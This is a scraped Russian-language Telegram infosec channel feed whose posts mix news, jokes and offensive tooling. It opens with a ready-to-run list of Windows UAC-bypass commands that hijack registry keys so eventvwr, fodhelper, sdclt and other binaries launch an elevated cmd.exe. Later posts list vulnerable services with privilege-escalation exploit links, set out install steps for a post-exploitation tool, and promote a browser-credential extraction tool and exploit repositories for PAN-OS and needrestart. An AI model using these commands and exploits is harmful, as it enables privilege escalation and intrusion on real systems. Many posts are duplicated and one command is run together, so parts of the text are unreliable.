🔗Ссылка:
https://habr.com/ru/companies/pt/articles/834486/
https://habr.com/ru/companies/pt/articles/834486/
Fsecurity | HH
@hellohackingteam
Канал про ИБ
Наш Discord: https://discord.gg/Eg8aDS7Hn7
Пожертвовать:
> https://www.donationalerts.com/r/xackapb
Наш блог:
> https://fsecurity.gitbook.io/blog
Fsecurity | HH (Russian)
Fsecurity | HH - это канал, посвященный информационной безопасности. Здесь вы найдете актуальные новости, советы по защите данных, аналитику уязвимостей и многое другое. Канал создан командой hellohackingteam, которая призвана помогать пользователям защищаться от киберугроз. Если вы хотите быть в курсе последних тенденций в сфере ИБ, то этот канал - для вас. Подписывайтесь, делитесь полезной информацией с друзьями и не забудьте заглянуть на наш Discord, где вы сможете задать вопросы экспертам по безопасности и обсудить актуальные темы. Присоединяйтесь к нашему сообществу уже сегодня!
Fsecurity | HH
14 Jan, 16:07
eventvwr.exe
reg add "HKCU\Software\Classes\mscfile\shell\open\command" /v DelegateExecute /t REG_SZ /d "" /f && reg add "HKCU\Software\Classes\mscfile\shell\open\command" /ve /t REG_SZ /d "cmd /c start cmd" /f && eventvwr.exe
fodhelper.exe
reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "cmd.exe" && start fodhelper.exe
sdclt.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe /ve /t REG_SZ /d "cmd.exe" /f && start sdclt.exe
slui.exe
reg add HKCU\Software\Classes\exefile\shell\open\command /ve /t REG_SZ /d "cmd.exe" /f && reg add HKCU\Software\Classes\exefile\shell\open\command /v DelegateExecute /f && start slui.exe
perfmon.exe
reg add "HKCU\Software\Classes\mscfile\shell\open\command" /v DelegateExecute /t REG_SZ /d "" /f && reg add "HKCU\Software\Classes\mscfile\shell\open\command" /ve /t REG_SZ /d "cmd /c start cmd" /f && start perfmon.exe
taskmgr.exe
reg add HKCU\Software\Classes\taskmgr\shell\open\command /ve /t REG_SZ /d "cmd.exe" /f && start taskmgr.exe
ComputerDefaults.exe
reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /ve /t REG_SZ /d "cmd.exe" /f && reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ /d "" /f && start computerdefaults.exe
sysprep.exe
reg add HKCU\Software\Classes\AppID\{921C1A8B-9F15-4DA4-9235-0472C3A216E6} /f /ve /t REG_SZ /d "cmd.exe" && start C:\Windows\System32\sysprep\sysprep.execontrol.exe
cmd /c reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /ve /d "cmd.exe" /f && control.exe /computername
Сброс:
reg delete "HKCU\Software\Classes\mscfile\shell\open\command" /f
reg delete "HKCU\Software\Classes\ms-settings\shell\open\command" /f
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /f
reg delete "HKCU\Software\Classes\exefile\shell\open\command" /f
reg delete "HKCU\Software\Classes\taskmgr\shell\open\command" /f
reg delete "HKCU\Software\Classes\AppID{921C1A8B-9F15-4DA4-9235-0472C3A216E6}" /f
#uac #bypass #windows
Fsecurity | HH
14 Jan, 12:29
Наш Discord сервер
👆🏻Тут можно пообщаться и найти много полезной информации 🦈
👆🏻Тут можно пообщаться и найти много полезной информации 🦈
Fsecurity | HH
14 Jan, 10:22
И еще новых трендов 2025!
Теперь уже с точки зрения того, на чем нужно фокусироваться.
Мне такие материалы нравятся. Во-первых, ищешь пересечения между ними и анализируешь причины появления той или иной точки зрения. А во-вторых, думаешь, чему будет посвящен еще один оборот Земли вокруг Солнца в плане твоей рабочей активности.
Приятно видеть, что тут ребята решили выделить в трендах безопасность кубера и resilience by design (прям подчеркну, не безопасность, а услойчивость).
Так что опять, читать и вникать - обязательно. Подумать, к чему вы сейчас больше предрасположены и сфокусироваться:)
Теперь уже с точки зрения того, на чем нужно фокусироваться.
Мне такие материалы нравятся. Во-первых, ищешь пересечения между ними и анализируешь причины появления той или иной точки зрения. А во-вторых, думаешь, чему будет посвящен еще один оборот Земли вокруг Солнца в плане твоей рабочей активности.
Приятно видеть, что тут ребята решили выделить в трендах безопасность кубера и resilience by design (прям подчеркну, не безопасность, а услойчивость).
Так что опять, читать и вникать - обязательно. Подумать, к чему вы сейчас больше предрасположены и сфокусироваться:)
Fsecurity | HH
13 Jan, 16:08
Некоторая аналитика
(картина полнотой не обладает, просто интересно что им известно)
#ransom
(картина полнотой не обладает, просто интересно что им известно)
#ransom
Fsecurity | HH
13 Jan, 14:10
Наш Discord сервер
👆🏻Тут можно пообщаться и найти много полезной информации 🦈
👆🏻Тут можно пообщаться и найти много полезной информации 🦈
Fsecurity | HH
13 Jan, 12:18
Инструмент пост эксплуатации
Установка:
git clone https://github.com/t3l3machus/ACEshark
cd ACEshark
pip3 install -r requirements.txt
Зависимости:
sudo apt-get install xclip
sudo apt-get install xselect
Запуск:
python3 ./ACEshark.py -s 10.10.1.10 -i
# Полученный скрипт выполняем на удаляемом хосте
#soft #python #acrshark
Fsecurity | HH
13 Jan, 08:06
Ребят, надолго приболел... По этому подождите меня, я вернусь 😷
P.s. иду на поправку
Fsecurity | HH
12 Jan, 18:08
Ну что, друзья, очнулись уже после салатных потасовок и сбитого режима? Значит настало время посмотреть, что интересного происходило в каналах за последнее время!
⚡ Начали год с азиатского кибермема – ссылка
⚡ Продолжили планами, чтобы автора канала было потом за что подтянуть – ссылка
⚡ Закрепили всё это дело майонезом другим кибермемом – ссылка
⚡ Узнали, как и где просчиталась Apple – ссылка
⚡ Посмотрели на то, как устроены запросы в браузере и насколько порой бывают душные собеседования – ссылка
⚡ Представили лицо TP-Link, на которых всё продолжают сваливаться беды – ссылка
❤ В Пакете Знаний вышел пост про самые важные и нужные протоколы: как на собеседованиях, так и в работе – ссылка
❤ В Пакете Вакансий вышла целая плеяда опросов и даже свежая вакансия от одного банка – ссылка
⚡ Пакет Безопасности | Чат | 🛍 Другие каналы
Fsecurity | HH
27 Dec, 18:13
Сколько не нападай на LockBit, он все равно не будет бит!
Как вещают эксперты, LockBit RaaS анонсировала версию 4.0 своей ransomware-платформы.
Она будет запущена в феврале, почти через год после того, как якобы версия 3.0 RaaS была нейтрализована в рамках операции силовой операции Cronos британской с участием британской NCA, Европола и американских спецслужб, которые даже свой DLS тогда на сервера банды прикрутили.
Как вещают эксперты, LockBit RaaS анонсировала версию 4.0 своей ransomware-платформы.
Она будет запущена в феврале, почти через год после того, как якобы версия 3.0 RaaS была нейтрализована в рамках операции силовой операции Cronos британской с участием британской NCA, Европола и американских спецслужб, которые даже свой DLS тогда на сервера банды прикрутили.
Fsecurity | HH
27 Dec, 10:07
Наш Discord сервер
👆🏻Тут можно пообщаться и найти много полезной информации 🦈
👆🏻Тут можно пообщаться и найти много полезной информации 🦈
Fsecurity | HH
27 Dec, 10:05
Ну что, все помнят жвачку "Love is..." с её крутыми милыми карточками внутри? Значит ловите подгон от меня на тему кибергигиены. Хоть печатайте и на стену в офисе вешайте – дарю 👍
#Кибергигиена #КиберМем
🔒 Пакет Безопасности | 💬 Чат | ⚡ Другие каналы
#Кибергигиена #КиберМем
Fsecurity | HH
27 Dec, 06:04
Не могу определиться, нравятся ли мне такие примеры про кибербезопасность (то ли дело учпочмак, который был примером фундамента моделирования угроз).
В целом, наглядно 😂
В целом, наглядно 😂
Fsecurity | HH
26 Dec, 17:21
Наш Discord сервер
👆🏻Тут можно пообщаться и найти много полезной информации 🦈
👆🏻Тут можно пообщаться и найти много полезной информации 🦈
Fsecurity | HH
24 Dec, 18:16
Попытались меня сейчас развести якобы от лица моего телефонного оператора
Назвали мои данные: ФИО, номер телефона, СНИЛС, ИНН. Якобы закончился срок действия номера телефона и предложили или продлить, или заменить на другой. Я чёт как лопух во всё поверил, т.к. очень грамотно ссылались на законодательные акты о перс данных, случаях серых симок и т.д.
Последнее, что остановило: СМС от госуслуг, гдесука написано: Смена пароля и код для подтверждения, который нужно было назвать боту. Вот тут я уже трубку сбросил.
Будьте бдительны и не видетесь на новую разводку❤️
Назвали мои данные: ФИО, номер телефона, СНИЛС, ИНН. Якобы закончился срок действия номера телефона и предложили или продлить, или заменить на другой. Я чёт как лопух во всё поверил, т.к. очень грамотно ссылались на законодательные акты о перс данных, случаях серых симок и т.д.
Последнее, что остановило: СМС от госуслуг, где
Будьте бдительны и не видетесь на новую разводку
Fsecurity | HH
24 Dec, 16:15
Всем привет!
Помимо стандартных компонентов Windows, на системе могут работать службы от сторонних поставщиков: системы слежения, настройки, управления, игрушки. В большинстве своем они также предоставляют опасность, работая от лица
Причем, как я понимаю, подобные службы обновляться должны самостоятельно с помощью соответствующего фирменного ПО, что усложняет процесс управления уязвимостями и потенциально дает нам еще один вектор повышения привилегий.
Есть достаточно много способов сбора информации о ПО на системе:
Хочу поделиться с вами небольшим списочком уязвимых служб, которые могут помочь взять систему на конечной тачке. Однозначно нужно интегрировать этот список в репозиторий Exploit-Street, но я что-то не могу придумать как. Может быть у вас есть идеи?
ManageEngine ServiceDesk
- https://github.com/horizon3ai/CVE-2021-44077
ManageEngine ADSelfService
- https://github.com/synacktiv/CVE-2021-40539
- CVE-2022-47966
- CVE-XXXX-XXXX (с версии ADSelfService Plus 4.2.9, 2012 и до версии 6.3 Build 6301)
UserManager
- CVE-2023-36047
ITunes
- CVE-2024-44193
Razer ( до 3.7.1209.121307)
- RazerEoP
Datacard XPS Card Printer Driver
- CVE-2024-34329
AppGate
- CVE-2019-19793
Seagate
- CVE-2022-40286
AWS VPN Client
- CVE-2022-25165
AIDA (уязвимы версии ниже 7.00.6742)
- AIDA64DRIVER-EOP
VboxSDS
- CVE-2024-21111
TeamViewer
- CVE-2024-7479 CVE-2024-7481
GamingService от XBOX
- GamingServiceEoP
- GamingServiceEoP5
Chrome Updater
- CVE-2023-7261
Plantronics Desktop Hub
- CVE-2024-27460
Помимо стандартных компонентов Windows, на системе могут работать службы от сторонних поставщиков: системы слежения, настройки, управления, игрушки. В большинстве своем они также предоставляют опасность, работая от лица
NT AUTHORITY\SYSTEM. Причем, как я понимаю, подобные службы обновляться должны самостоятельно с помощью соответствующего фирменного ПО, что усложняет процесс управления уязвимостями и потенциально дает нам еще один вектор повышения привилегий.
Есть достаточно много способов сбора информации о ПО на системе:
# Извлечение из реестра
Get-ChildItem "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall" | Get-ItemProperty | Where-Object {$_.DisplayName -ne $null} | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate
# wmi
wmic product get name,version,vendor
# Seatbelt
.\SeatBelt.exe InstalledProducts
Хочу поделиться с вами небольшим списочком уязвимых служб, которые могут помочь взять систему на конечной тачке. Однозначно нужно интегрировать этот список в репозиторий Exploit-Street, но я что-то не могу придумать как. Может быть у вас есть идеи?
ManageEngine ServiceDesk
- https://github.com/horizon3ai/CVE-2021-44077
ManageEngine ADSelfService
- https://github.com/synacktiv/CVE-2021-40539
- CVE-2022-47966
- CVE-XXXX-XXXX (с версии ADSelfService Plus 4.2.9, 2012 и до версии 6.3 Build 6301)
UserManager
- CVE-2023-36047
ITunes
- CVE-2024-44193
Razer ( до 3.7.1209.121307)
- RazerEoP
Datacard XPS Card Printer Driver
- CVE-2024-34329
AppGate
- CVE-2019-19793
Seagate
- CVE-2022-40286
AWS VPN Client
- CVE-2022-25165
AIDA (уязвимы версии ниже 7.00.6742)
- AIDA64DRIVER-EOP
VboxSDS
- CVE-2024-21111
TeamViewer
- CVE-2024-7479 CVE-2024-7481
GamingService от XBOX
- GamingServiceEoP
- GamingServiceEoP5
Chrome Updater
- CVE-2023-7261
Plantronics Desktop Hub
- CVE-2024-27460
Fsecurity | HH
24 Dec, 14:15
Sickle - это инструмент, который я изначально разработал, чтобы помочь себе быть более эффективным как в разработке, так и в понимании шеллкода. Однако в процессе разработки и использования он превратился в платформу для разработки полезной нагрузки. Хотя текущие модули в основном предназначены для сборки, этот инструмент не ограничивается шеллкодом.
🔗Ссылка:
https://github.com/wetw0rk/Sickle
🔗Ссылка:
https://github.com/wetw0rk/Sickle
Fsecurity | HH
24 Dec, 12:00
В этом документе описывается, как создать программу Purple Team - от специальных командных упражнений Purple до оперативного объединения в команду Purple и создания специальной команды Purple. Командные упражнения Purple - это эффективный метод тестирования, измерения и повышения устойчивости вашей организации к реальным кибератакам. Purple Teaming фокусируется на укреплении сотрудничества со всей вашей организацией, включая сотрудников, процессы и технологии (стек безопасности).
🔗Ссылка:
https://github.com/scythe-io/purple-team-exercise-framework
🔗Ссылка:
https://github.com/scythe-io/purple-team-exercise-framework
Fsecurity | HH
23 Dec, 20:15
Ну... Как-то так 🤔
Я решил временно отдохнуть и временно ролик будут уже только в следующем году 🎄
🔗Ссылка:
https://www.securitylab.ru/news/555033.php
Я решил временно отдохнуть и временно ролик будут уже только в следующем году 🎄
🔗Ссылка:
https://www.securitylab.ru/news/555033.php
Fsecurity | HH
23 Dec, 18:09
Извлекает и расшифровывает данные браузера, поддерживает несколько типов данных, работает в различных операционных системах (macOS, Windows, Linux).
🔗Ссылка:
https://github.com/moonD4rk/HackBrowserData
🔗Ссылка:
https://github.com/moonD4rk/HackBrowserData
Fsecurity | HH
23 Dec, 10:07
Коллектор сессий из SCCM для BloodHound
https://github.com/CrowdStrike/sccmhound
#ad #pentest #bloodhound
https://github.com/CrowdStrike/sccmhound
#ad #pentest #bloodhound
Fsecurity | HH
23 Dec, 08:01
🔗Ссылка:
https://habr.com/ru/companies/beeline_cloud/articles/868650/
https://habr.com/ru/companies/beeline_cloud/articles/868650/
Fsecurity | HH
22 Dec, 20:03
It's a series of articles all about web front-end security.
https://aszx87410.github.io/beyond-xss/en/
🪳 @bugxplorer
https://aszx87410.github.io/beyond-xss/en/
Fsecurity | HH
22 Dec, 18:13
🤔 Вы когда-нибудь задумывались, почему вы НИКОГДА не видите chunked ответов в Burp Suite?
Ответ прост: настройки по умолчанию скрывают их!
Перейдите в
💡 Chunked transfer encoding — механизм передачи данных в HTTP-протоколе, позволяющий надёжно доставлять данные от сервера клиенту без необходимости заранее знать точный размер всего тела HTTP-сообщения.
Это достигается разбиением сообщения на небольшие части (chunks), а затем передачей каждой части с указанием только её размера (в шестнадцатеричном виде). Окончание передачи сообщения определяется наличием последней части с нулевой длиной.
Такой механизм позволяет передать динамически сформированные объекты, для которых нельзя заранее определить размер. Он стал доступен только начиная с HTTP версии 1.1.
Без механизма сhunked transfer encoding с каждым HTTP-пакетом необходимо указывать заголовок Content-Length, чтобы клиент мог найти конец передаваемого сообщения.
#tips #tools
Ответ прост: настройки по умолчанию скрывают их!
Перейдите в
Settings > Network > HTTP > Streaming responses, чтобы исправить это 🔍Это достигается разбиением сообщения на небольшие части (chunks), а затем передачей каждой части с указанием только её размера (в шестнадцатеричном виде). Окончание передачи сообщения определяется наличием последней части с нулевой длиной.
Такой механизм позволяет передать динамически сформированные объекты, для которых нельзя заранее определить размер. Он стал доступен только начиная с HTTP версии 1.1.
Без механизма сhunked transfer encoding с каждым HTTP-пакетом необходимо указывать заголовок Content-Length, чтобы клиент мог найти конец передаваемого сообщения.
#tips #tools
Fsecurity | HH
23 Nov, 20:04
CVE-2024-48990: Linux LPE via needrestart
PATCHED: Nov 19, 2024
PoC: https://github.com/makuga01/CVE-2024-48990-PoC
Info: https://www.qualys.com/2024/11/19/needrestart/needrestart.txt
P.S. Хоть для привеска и нужно дожидаться запуска
#exploit #pentest #redteam #lpe #linux
PATCHED: Nov 19, 2024
PoC: https://github.com/makuga01/CVE-2024-48990-PoC
Info: https://www.qualys.com/2024/11/19/needrestart/needrestart.txt
P.S. Хоть для привеска и нужно дожидаться запуска
needrestart (который стартует, например, при apt upgrade), патчу всего три дня, и он еще не добавлен во все репы Debian)#exploit #pentest #redteam #lpe #linux
Fsecurity | HH
23 Nov, 14:21
Мы уже много раз говорили про проблемы с NetNTLMv1 (1, 2, 3), поэтому давайте сегодня разберемся все таки от куда они берутся и ответим еще на пару вопросов.
Включение и отключение NetNTLMv1 аутентификации управляется через политику (Computer Configuration -> Windows Settings -> Security Settings -> Local Policies -> Security Options -> Network security: LAN Manager authentication level). Политика может быть локальной или групповой, так же устанавливает значение реестра MACHINE\System\CurrentControlSet\Control\Lsa\LmCompatibilityLevel в 4,0 или 4,1
4,0 - Отправляет LM и NTLM ответы
4,1 - Отправляет LM и NTLM, использует NTLMv2 если поддерживается
Следовательно, если есть возможность, то стоит прочитать данный ключ реестра через службу удаленного реестра на всех машинах в домене... но есть ли способ проще?
На самом деле есть! В больших корпоративных сетях данная настройка скорее всего будет раскатываться через групповую политику, а групповая политика будет храниться на контроллерах домена и доступна для чтения всем пользователям.
Более того, с помощью групповых политик можно применить данную настройку не ко всему домену, а например к маленькой группе машин, объеденных в OU.
Специально для поиска таких GPO вы можете использовать инструмент GPOHunter https://github.com/PShlyundin/GPOHunter.
P.S. инструмент еще будет дорабатываться, но уже сейчас, помимо NetNTLMv1, он поможет найти вам GPO хранящие пароль локальных УЗ (MS14-025), а так же выявит использование reversible encryption и к кому оно применяется.
Включение и отключение NetNTLMv1 аутентификации управляется через политику (Computer Configuration -> Windows Settings -> Security Settings -> Local Policies -> Security Options -> Network security: LAN Manager authentication level). Политика может быть локальной или групповой, так же устанавливает значение реестра MACHINE\System\CurrentControlSet\Control\Lsa\LmCompatibilityLevel в 4,0 или 4,1
4,0 - Отправляет LM и NTLM ответы
4,1 - Отправляет LM и NTLM, использует NTLMv2 если поддерживается
Следовательно, если есть возможность, то стоит прочитать данный ключ реестра через службу удаленного реестра на всех машинах в домене... но есть ли способ проще?
На самом деле есть! В больших корпоративных сетях данная настройка скорее всего будет раскатываться через групповую политику, а групповая политика будет храниться на контроллерах домена и доступна для чтения всем пользователям.
Более того, с помощью групповых политик можно применить данную настройку не ко всему домену, а например к маленькой группе машин, объеденных в OU.
Специально для поиска таких GPO вы можете использовать инструмент GPOHunter https://github.com/PShlyundin/GPOHunter.
P.S. инструмент еще будет дорабатываться, но уже сейчас, помимо NetNTLMv1, он поможет найти вам GPO хранящие пароль локальных УЗ (MS14-025), а так же выявит использование reversible encryption и к кому оно применяется.
Fsecurity | HH
23 Nov, 12:11
Наш Discord сервер
👆🏻Тут можно пообщаться и найти много полезной информации 🦈
👆🏻Тут можно пообщаться и найти много полезной информации 🦈
Fsecurity | HH
22 Nov, 16:13
Наш Discord сервер
👆🏻Тут можно пообщаться и найти много полезной информации 🦈
👆🏻Тут можно пообщаться и найти много полезной информации 🦈
Fsecurity | HH
22 Nov, 16:13
🔗Ссылка:
https://habr.com/ru/companies/swordfish_security/articles/859904/
https://habr.com/ru/companies/swordfish_security/articles/859904/
Fsecurity | HH
22 Nov, 08:14
Наш Discord сервер
👆🏻Тут можно пообщаться и найти много полезной информации 🦈
👆🏻Тут можно пообщаться и найти много полезной информации 🦈
Fsecurity | HH
21 Nov, 18:04
A critical vulnerability chain in Palo Alto PAN-OS, combining an authentication bypass (CVE-2024-0012) and a command injection flaw (CVE-2024-9474) in the management web interface, allows unauthenticated attackers to execute arbitrary code with root privileges.
🛠 Affected Versions:
— PAN-OS 11.2 (up to and including 11.2.4-h1)
— PAN-OS 11.1 (up to and including 11.1.5-h1)
— PAN-OS 11.0 (up to and including 11.0.6-h1)
— PAN-OS 10.2 (up to and including 10.2.12-h2)
🔗 Research:
https://labs.watchtowr.com/pots-and-pans-ssl-vpn-palo-alto-pan-os-cve-2024-0012-cve-2024-9474/
🔗 PoC:
https://github.com/watchtowrlabs/palo-alto-panos-cve-2024-0012
🔗 Exploit:
https://github.com/Chocapikk/CVE-2024-9474
#paloalto #panos #sslvpn #unauth #rce
2,397
subscribers
919
photos
66
videos
![[Blog] Поиск Организаций Telegram Channel](/avatar/1973/1973992780.jpg)
